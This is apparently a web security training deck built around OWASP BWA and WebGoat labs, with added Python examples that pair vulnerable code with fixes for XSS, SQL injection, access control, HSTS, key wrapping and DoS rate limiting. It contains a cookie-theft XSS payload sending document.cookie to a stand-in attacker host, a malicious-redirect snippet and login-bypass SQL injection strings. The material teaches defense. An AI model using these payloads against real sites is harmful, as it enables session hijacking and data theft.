Topics include:
- Sample and Demo of Top Application Risks — Cross Site Scripting, SQL Injection, Access Control
- Who’s Monitoring Your Traffic? — Encrypting in Transit
- Secure Data Storage & Protection — Correct Password Storage & Data Protection
- Growing Threats Plaguing Applications
4. “The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”
http://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking
http://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/
5. Data Loss & Breaches
datalossdb.org
Verizon Data Breach Report 2013
7. Security - Into The Details
• Sample and Demo of Top Application Risks — Cross Site Scripting, SQL Injection, Access Control
• Who’s Monitoring Your Traffic? — Encrypting in Transit
• Secure Data Storage & Protection — Correct Password Storage & Data Protection
• Growing Threats Plaguing Applications
10. What are Web Requests
Open a console & enter the following:
• telnet google.com 80
GET / HTTP/1.1
Host: google.com
• Hit return 2 times (the empty line ends the request headers; HTTP/1.1 requires the Host header, and most servers answer 400 without it)
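The same request the telnet demo types by hand, built and parsed in Python. This is an added example, not code from the slides; the response bytes are constructed here so the parser runs offline, and only fetch() needs network access.

```python
# Added example, not from the slides: build the raw HTTP/1.1 request the
# telnet demo types by hand, and parse the response that comes back.
import socket


def build_request(host, path="/"):
    """Bytes a client sends for GET <path> on <host>.

    HTTP/1.1 requires a Host header (RFC 7230 section 5.4); without it most
    servers answer 400. The empty line (CRLF CRLF) ends the header block,
    which is why the telnet demo presses return twice.
    """
    lines = [
        "GET %s HTTP/1.1" % path,
        "Host: %s" % host,
        "Connection: close",   # ask the server to close after one response
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_response(raw):
    """Split raw response bytes into (status_code, headers, body).

    Header names are lower-cased because HTTP header names are
    case-insensitive.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    parts = status_line.split(" ", 2)          # "HTTP/1.1", "200", "OK"
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers, body


def fetch(host, port=80, path="/"):
    """What 'telnet host 80' does, over a socket (needs network access)."""
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(build_request(host, path))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return parse_response(b"".join(chunks))


# Constructed sample response (not captured from google.com).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Set-Cookie: SESSIONID=abc123; Path=/\r\n"
    b"Content-Length: 19\r\n"
    b"\r\n"
    b"<html>hello</html>\n"
)

if __name__ == "__main__":
    code, headers, body = parse_response(SAMPLE_RESPONSE)
    print(code, headers["content-type"], body)
```

The Set-Cookie header in the sample is the kind of value the XSS payloads later in the deck try to read from document.cookie.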
11. Cross Site Scripting (XSS)
• Problem: User controlled data returned in the HTTP response contains HTML/JavaScript code
• Impact: Session Hijacking, Full Control of Page, Malicious Redirects
• Basic XSS Test:
"><script>alert(document.cookie)</script>
• Cookie Theft Example:
"><script>document.location='http://attackersite/'+document.cookie</script>
12. XSS Behind The Scenes
Request: http://shinypage.com?name=Bob
JSP Code:
<h1>Glad to see you <%= request.getParameter("name") %></h1>
HTML Source / Rendered HTML: the parameter value is copied into the response without encoding, so any markup it contains is interpreted by the browser. With name=<b>Bob</b> the page becomes:
<h1>Glad to see you <b>Bob</b></h1>
15. Cross Site Scripting
• Cross Site Scripting typically uses JavaScript to do bad things
• Steal session cookies (the alert only proves the script runs; the cookie-theft payload above sends the value to an attacker-controlled host; cookies flagged HttpOnly are not readable from document.cookie, which blunts this payload but not the others):
<script>alert(document.cookie)</script>
• Redirect to bad pages:
<script>window.location = "http://evilsite.com/"</script>
• Rewrite page on the fly
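The JSP greeting from the "XSS Behind The Scenes" slide, reproduced in Python beside the output-encoded version of the same page. This is an added example, not code from the slides; the second sink (a profile link) is added to show why the test payloads start with `">`, which closes an attribute before the script tag.

```python
# Added example, not from the slides: reflected XSS and its fix (entity
# encoding at the point of output).
import html

# The two payloads from the XSS slide.
XSS_PROBE = '"><script>alert(document.cookie)</script>'
COOKIE_THEFT = ('"><script>document.location=\'http://attackersite/\''
                '+document.cookie</script>')


def greet_vulnerable(name):
    """Mirrors <h1>Glad to see you <%= request.getParameter("name") %></h1>:
    the parameter is copied straight into the response."""
    return "<h1>Glad to see you %s</h1>" % name


def greet_encoded(name):
    """Same page with HTML entity encoding applied where the value is
    written out. < > & " ' become entities, so the browser shows the
    payload as text instead of executing it."""
    return "<h1>Glad to see you %s</h1>" % html.escape(name, quote=True)


def profile_link_vulnerable(user):
    """Attribute context: the payload's leading " closes the href and >
    closes the tag, then the script runs."""
    return '<a href="/profile?user=%s">profile</a>' % user


def profile_link_encoded(user):
    """quote=True matters here: without it " would survive and the
    attribute could still be broken out of."""
    return '<a href="/profile?user=%s">profile</a>' % html.escape(user, quote=True)


def contains_script_tag(page):
    """Crude check used only to illustrate the difference. Real detection
    needs an HTML parser; this just looks for a live <script tag."""
    return "<script" in page.lower()


if __name__ == "__main__":
    for sink in (greet_vulnerable, greet_encoded,
                 profile_link_vulnerable, profile_link_encoded):
        print(sink.__name__, "->", sink(XSS_PROBE))
```

Encoding is context-specific: html.escape is right for HTML text and quoted attribute values, but a value written into a JavaScript string, a URL, or CSS needs the encoder for that context.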
24. SQL Injection
• Problem: User controlled data improperly used with SQL statements
• Impact: Arbitrary SQL Execution, Data Corruption, Data Theft
• Basic SQL Injection Tests:
OR 1=1 --
' OR '1'='1'--
• Example Vulnerable Query (built by string concatenation):
sqlQ = "Select user from UserTable where name='" + username + "' and pass='" + password + "'"
26. SQL Injection
• Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection
• Proxy Needed
• Objective: Bypass the login page by inserting “control” characters. Login as “Neville” w/o knowledge of the password
27. SQL Injection
• HTTP Post
employee_id=112&password=x' OR '1'='1&action=Login
• Vulnerable SQL
Select user from UserTable where name='" + username + "' and pass='" + password + "'"
• Resulting Statement
Select user from UserTable where name='112' and pass='x' OR '1'='1'
• Result: ... name='112' and pass='x' OR TRUE. AND binds tighter than OR, so the WHERE clause is true for every row and the first user in the table is returned
28. SQL Injection
• Parameterized Queries
No confusion with control characters: the values travel separately from the SQL text, so a quote in the input is just a character to compare
Example: the query would look for the literal password ' or '1'='1 and find nothing
• Input Validation
Are special characters needed for most fields?
What about non-printable characters %00-%0A?
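The WebGoat login from slides 26 to 28, reproduced against an in-memory SQLite table with the vulnerable concatenated query beside the parameterized one, plus the allow-list validation slide 28 asks about. This is an added example, not the lab's own code; the table contents are constructed.

```python
# Added example, not from the slides: string SQL injection and the two
# defences (placeholders, input validation) against SQLite.
import re
import sqlite3


def make_db():
    """Constructed UserTable with the lab's target user."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE UserTable (name TEXT, pass TEXT, user TEXT)")
    db.execute("INSERT INTO UserTable VALUES ('112', 's3cret', 'Neville')")
    return db


def vulnerable_sql(username, password):
    """The statement exactly as the 'Vulnerable SQL' slide builds it."""
    return ("SELECT user FROM UserTable WHERE name='" + username +
            "' AND pass='" + password + "'")


def login_vulnerable(db, username, password):
    """Executes the concatenated statement; user input becomes SQL."""
    row = db.execute(vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    """Placeholders: the driver sends the values separately from the SQL
    text, so x' OR '1'='1 is compared as a 13-character password."""
    sql = "SELECT user FROM UserTable WHERE name=? AND pass=?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def is_valid_employee_id(value):
    """Allow-list validation for a field that never needs quotes, spaces
    or control characters (%00-%0A): digits only, bounded length."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_sql("112", "x' OR '1'='1"))
    print("vulnerable:", login_vulnerable(db, "112", "x' OR '1'='1"))
    print("parameterized:", login_parameterized(db, "112", "x' OR '1'='1"))
```

Validation is a second layer, not a replacement for placeholders: a free-text field such as a surname legitimately contains an apostrophe, and only parameterization keeps that apostrophe out of the SQL grammar.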
30. Access Control
• Problem: Developers assume some parts of the app can’t be seen, tampered with or invoked by the user
• Impact: Unauthorized data access, access to privileged functionality
• Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments
• Access Control Failure Example (a logged-in customer changes the id and sees someone else’s account):
http://somebadbank.com/showacct?id=101
http://somebadbank.com/showacct?id=102
32. Access Control Violation
• Lesson: Access Control Flaws -> LAB: Role Based Access Control -> Stage 1: Bypass Business Layer Access Control
• Proxy Needed
• Objective: Find a way to execute the “delete” functionality using Tom’s account. Delete account “tom”
33. Access Control Violation
• Hint: Login with Tom and perform the available actions (search staff, view profile). Figure out how the action name is sent to the server
POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1
Host: localhost

employee_id=105&action=ViewProfile
34. Strong Access Controls
• Access Control Performed Server Side
• Never Relies Upon “Security by Obscurity”
• Be Careful with Identifiers (e.g. id=123): check that the requesting user is authorized for that specific object, not just logged in
• Attacker Can Send Anything in Request
• Presentation Layer Controls (hidden menu items, disabled buttons, JavaScript checks) Can Not Enforce Access Control
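Both failures from the access-control slides (showacct?id=N and the WebGoat action= parameter) as server-side handlers, each next to the check that closes it. This is an added example, not code from the slides or from WebGoat; the accounts, users and role table are constructed, and the HTTP status codes stand in for real responses.

```python
# Added example, not from the slides: object-level and function-level
# access control enforced on the server, whatever the request says.
from urllib.parse import parse_qs

# Constructed data. In the bank example each account has an owner; in the
# WebGoat example each user has a role that maps to an allowed action set.
ACCOUNTS = {101: {"owner": "alice", "balance": 500},
            102: {"owner": "bob", "balance": 9000}}
ROLES = {"alice": "customer", "bob": "customer",
         "tom": "employee", "jerry": "manager"}
ACTIONS_BY_ROLE = {
    "customer": set(),
    "employee": {"SearchStaff", "ViewProfile"},
    "manager": {"SearchStaff", "ViewProfile", "DeleteProfile"},
}


def show_account_vulnerable(session_user, account_id):
    """showacct?id=N as on the slide: trusts the id, so iterating
    101, 102, ... dumps every customer's account."""
    acct = ACCOUNTS.get(account_id)
    return (200, acct) if acct else (404, None)


def show_account(session_user, account_id):
    """Object-level check: the session user must own the object.
    Missing and foreign ids get the same answer, so the id space
    cannot be enumerated through the error code."""
    acct = ACCOUNTS.get(account_id)
    if acct is None or acct["owner"] != session_user:
        return 403, None
    return 200, acct


def run_action(action):
    return "executed " + action


def dispatch_vulnerable(session_user, action):
    """Only the menu hides 'DeleteProfile' from employees; the handler
    runs whatever action name arrives in the POST body."""
    return 200, run_action(action)


def dispatch(session_user, action):
    """Function-level check against the role's allow-list."""
    role = ROLES.get(session_user)
    if action not in ACTIONS_BY_ROLE.get(role, set()):
        return 403, None
    return 200, run_action(action)


def handle_post(session_user, body):
    """Parse the form body from the WebGoat hint and dispatch it."""
    form = parse_qs(body)
    action = form.get("action", [""])[0]
    return dispatch(session_user, action)


if __name__ == "__main__":
    print(show_account_vulnerable("alice", 102))   # bob's account leaks
    print(show_account("alice", 102))              # (403, None)
    print(handle_post("tom", "employee_id=105&action=DeleteProfile"))
```

The allow-list is keyed on the role, not on the user's claimed identity in the request: employee_id=105 in the body is just another attacker-controlled value, so the session is the only input these checks trust.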
39. Secure Design for Communication
• Use HTTPS Throughout Web Site!
• HTTP Strict Transport Security (HSTS)
  • Opt-in security control
  • Website instructs compatible browser to enable STS for the site (via the Strict-Transport-Security response header, which the browser only honours when it arrives over HTTPS)
• HSTS Forces (for enabled site):
  • All communication over HTTPS
  • No insecure HTTP requests sent from browser
  • No option for user to override untrusted certificates
40. Strict Transport Security
• Browser prevents HTTP requests to HSTS site
• Any request to site is “upgraded” to HTTPS before it leaves the browser
• No clear text HTTP traffic ever sent to HSTS site once the policy is known; the very first visit can still go over HTTP unless the site is on the browser preload list, so keep the HTTP-to-HTTPS redirect as well
• Browser assumes HTTPS for HSTS sites
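The header the site sends and what a compliant browser does with it, following RFC 6797: parse the policy, keep it only when received over HTTPS, expire it after max-age, and rewrite http:// URLs for known hosts (and their subdomains when includeSubDomains is set). This is an added example of the HSTS mechanism from slides 39 and 40, not code from the slides; the host names and header value are constructed.

```python
# Added example, not from the slides: a minimal model of the browser side
# of HTTP Strict Transport Security (RFC 6797).
import time

# Typical header a site sends: one year, covering subdomains.
HSTS_HEADER = "max-age=31536000; includeSubDomains"


def parse_hsts(value):
    """Strict-Transport-Security -> (max_age_seconds or None, include_subdomains)."""
    max_age, subdomains = None, False
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            max_age = int(val.strip().strip('"'))
        elif name == "includesubdomains":
            subdomains = True
    return max_age, subdomains


class HstsCache:
    """The browser's per-host STS store. `now` is injectable for tests."""

    def __init__(self, now=time.time):
        self.now = now
        self.hosts = {}   # host -> (expiry_time, include_subdomains)

    def observe(self, host, over_https, headers):
        """Record a policy from a response. `headers` keys are lower-case."""
        if not over_https:
            return            # RFC 6797 s8.1: ignore the header on plain HTTP
        value = headers.get("strict-transport-security")
        if value is None:
            return
        max_age, subdomains = parse_hsts(value)
        if max_age is None:
            return            # malformed: no max-age, policy not stored
        if max_age == 0:
            self.hosts.pop(host, None)   # max-age=0 withdraws the policy
        else:
            self.hosts[host] = (self.now() + max_age, subdomains)

    def is_known(self, host):
        """True if host, or a parent with includeSubDomains, has a live policy."""
        labels = host.split(".")
        for i in range(len(labels)):
            entry = self.hosts.get(".".join(labels[i:]))
            if entry and entry[0] > self.now() and (i == 0 or entry[1]):
                return True
        return False

    def rewrite(self, url):
        """Upgrade http:// to https:// for known hosts, before any request
        is sent; unknown hosts are left alone (the first-visit gap)."""
        if not url.startswith("http://"):
            return url
        hostport, sep, path = url[len("http://"):].partition("/")
        host, _, port = hostport.partition(":")
        if not self.is_known(host):
            return url
        if port == "80":          # explicit port 80 becomes the https default
            hostport = host
        return "https://" + hostport + sep + path


if __name__ == "__main__":
    cache = HstsCache()
    cache.observe("shinypage.com", True, {"strict-transport-security": HSTS_HEADER})
    print(cache.rewrite("http://www.shinypage.com/login"))
```

The first-visit gap is why the deck's "Use HTTPS Throughout" point still needs a server-side redirect: until the browser has seen the header over HTTPS (or the site is preloaded), it has nothing to upgrade.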
45. Encrypting Sensitive Data in Database
[Diagram: the application encrypts and decrypts user data with a Customer/Group Encryption Key; that key is stored in the database only in encrypted form, wrapped by a Key Encrypting Key that lives in a Hardware Security Module]
• Encryption within Database
• Unique keys per data region
• Key encrypting keys
• Hardware Security Modules
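The key hierarchy in the diagram as working code: one data-encryption key per customer, each stored only after being wrapped by a key-encrypting key that never leaves the HSM, and a KEK rotation that re-wraps the small set of DEKs without touching the encrypted rows. This is an added example, not code from the slides; the HSM is a stand-in class, and the cipher is a toy HMAC-SHA256 keystream with encrypt-then-MAC standing in for AES-GCM, which is what a real deployment (or a real HSM) would use. The customer names and field values are constructed.

```python
# Added example, not from the slides: envelope encryption with per-customer
# DEKs, a KEK held in an (assumed, stand-in) HSM, and KEK rotation.
# The stream cipher below is a TOY standing in for AES-GCM; the key
# hierarchy around it is the real pattern.
import hashlib
import hmac
import os


def keystream_xor(key, nonce, data):
    """Toy cipher: keystream block i = HMAC-SHA256(key, nonce || i). NOT AES."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hmac.new(key, nonce + (i // 32).to_bytes(8, "big"),
                         hashlib.sha256).digest()
        out.extend(b ^ k for b, k in zip(data[i:i + 32], block))
    return bytes(out)


def seal(key, plaintext):
    """nonce || ciphertext || tag (encrypt-then-MAC over nonce+ciphertext)."""
    nonce = os.urandom(16)
    ct = keystream_xor(key, nonce, plaintext)
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def unseal(key, blob):
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("integrity check failed")
    return keystream_xor(key, nonce, ct)


class Hsm:
    """Stand-in for the HSM: KEKs stay inside; callers only wrap/unwrap."""

    def __init__(self):
        self._keks = {1: os.urandom(32)}
        self.current = 1

    def wrap(self, dek):
        return self.current, seal(self._keks[self.current], dek)

    def unwrap(self, version, wrapped):
        return unseal(self._keks[version], wrapped)

    def rotate_kek(self):
        self.current += 1
        self._keks[self.current] = os.urandom(32)
        return self.current


class EncryptedStore:
    """What the database holds: wrapped DEKs and ciphertext, never a raw key."""

    def __init__(self, hsm):
        self.hsm = hsm
        self.wrapped_deks = {}   # customer -> (kek_version, wrapped DEK)
        self.rows = {}           # (customer, field) -> ciphertext

    def _dek(self, customer):
        if customer not in self.wrapped_deks:
            dek = os.urandom(32)              # unique key per customer/group
            self.wrapped_deks[customer] = self.hsm.wrap(dek)
            return dek
        version, wrapped = self.wrapped_deks[customer]
        return self.hsm.unwrap(version, wrapped)

    def put(self, customer, field, value):
        self.rows[(customer, field)] = seal(self._dek(customer), value)

    def get(self, customer, field):
        return unseal(self._dek(customer), self.rows[(customer, field)])

    def rewrap_all(self):
        """KEK rotation: re-wrap every DEK under the new KEK. Data rows are
        untouched, which is the point of the extra layer."""
        new_version = self.hsm.rotate_kek()
        for customer, (version, wrapped) in list(self.wrapped_deks.items()):
            dek = self.hsm.unwrap(version, wrapped)
            self.wrapped_deks[customer] = self.hsm.wrap(dek)
        return new_version
```

Compromise of one customer's DEK exposes only that customer's rows, and a leaked database dump without the HSM yields neither keys nor plaintext; the toy cipher would need replacing with an AEAD before any of this is used for real.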
48. Denial of Service
• Network DDOS: exhaust network bandwidth
• Application Layer DDOS (e.g. repeatedly calling site.com/generateReport): exhaust server CPU/memory
49. Application Denial of Service
Traditional Network DDOS:
• overwhelms target with volume
• exhausts bandwidth / capacity of network devices
• Requires large number of machines
• Defenses: CDN, anti-DDOS services
Application DDOS:
• invokes computationally intense application functions
• exhausts CPU / memory of web servers
• Requires few machines
• Defenses: Few available, must customize
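One of the "must customize" defences for application-layer DoS: a per-client spending budget where each endpoint is charged by how expensive it is, so a handful of generateReport calls from one client is refused while ordinary browsing continues. This is an added example, not code from the slides; the endpoint costs, budget, window and client addresses are constructed.

```python
# Added example, not from the slides: cost-weighted rate limiting for
# expensive application functions (sliding window per client).
import collections
import time

# Constructed: relative cost of each endpoint, budget per client per window.
ENDPOINT_COST = {"/generateReport": 50, "/search": 5, "/": 1}
BUDGET = 100        # cost units a client may spend per window
WINDOW = 60.0       # seconds


class CostLimiter:
    """Tracks spend per client; `now` is injectable so tests control time."""

    def __init__(self, now=time.time):
        self.now = now
        self.spent = collections.defaultdict(collections.deque)  # client -> (ts, cost)

    def allow(self, client, path):
        """Charge the request's cost against the client's window; False
        means the server should answer 429 instead of doing the work."""
        cost = ENDPOINT_COST.get(path, 1)     # unknown endpoints cost the minimum
        history = self.spent[client]
        t = self.now()
        while history and history[0][0] <= t - WINDOW:
            history.popleft()                 # forget spend outside the window
        if sum(c for _, c in history) + cost > BUDGET:
            return False
        history.append((t, cost))
        return True

    def remaining(self, client):
        t = self.now()
        return BUDGET - sum(c for ts, c in self.spent[client] if ts > t - WINDOW)


if __name__ == "__main__":
    limiter = CostLimiter()
    for _ in range(3):
        print("/generateReport", limiter.allow("10.0.0.5", "/generateReport"),
              "remaining", limiter.remaining("10.0.0.5"))
```

The client key is the weak point: a source IP is shared behind NAT and trivially spread across a small botnet, so in practice the key is the authenticated session where one exists, and the expensive function itself is also capped (queueing or a concurrency limit) so the budget is enforced before CPU is spent rather than after.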
51. Take Aways
• Understand top security threats and anticipate potential malicious use of the application to design secure code
• Multiple controls possible to protect sensitive data in transit and storage
• Understand emerging threats to plan for appropriate defenses
• Use OWASP BWA Security Lab and learn more!
55. Test Connectivity to VM
1. Open Browser
2. Browse to your VM ip (listed in VM login page)
• e.g. http://192.168.56.101
3. Should see OWASP BWA welcome page
4. Error? Check ip address of VM
57. Understanding the Proxy
• Proxy is a middle-man between browser and web server
• Assists with traffic manipulation & inspection
[Diagram: Attacker’s Browser -> Web Proxy -> Web Server]
61. Set Firefox Proxy
• Set Firefox proxy to port 8080 (the port the intercepting proxy listens on, normally on 127.0.0.1)
• Preferences -> Advanced -> Network -> Settings
• Set HTTP Proxy
• Important - clear the “No Proxy for” line (hosts listed there, localhost by default, bypass the proxy and cannot be intercepted)
63. Intercepting Traffic
• Add a “breakpoint” by right clicking on the page and choosing “Break...”
• Refresh the webpage - it will hang
• Modify the request as needed, then press the “Continue” button
64. “Hello World” of Proxies
• Lesson: General -> Http Basic
• Objective:
  • Enter your name into the text box
  • Intercept with proxy & change the entered name to a different value
  • Receive response & observe the modified value is reversed
[Diagram: the browser sends “Joe”; the web proxy changes it to “Sue”; the web server replies “euS”, which is what the attacker’s browser displays]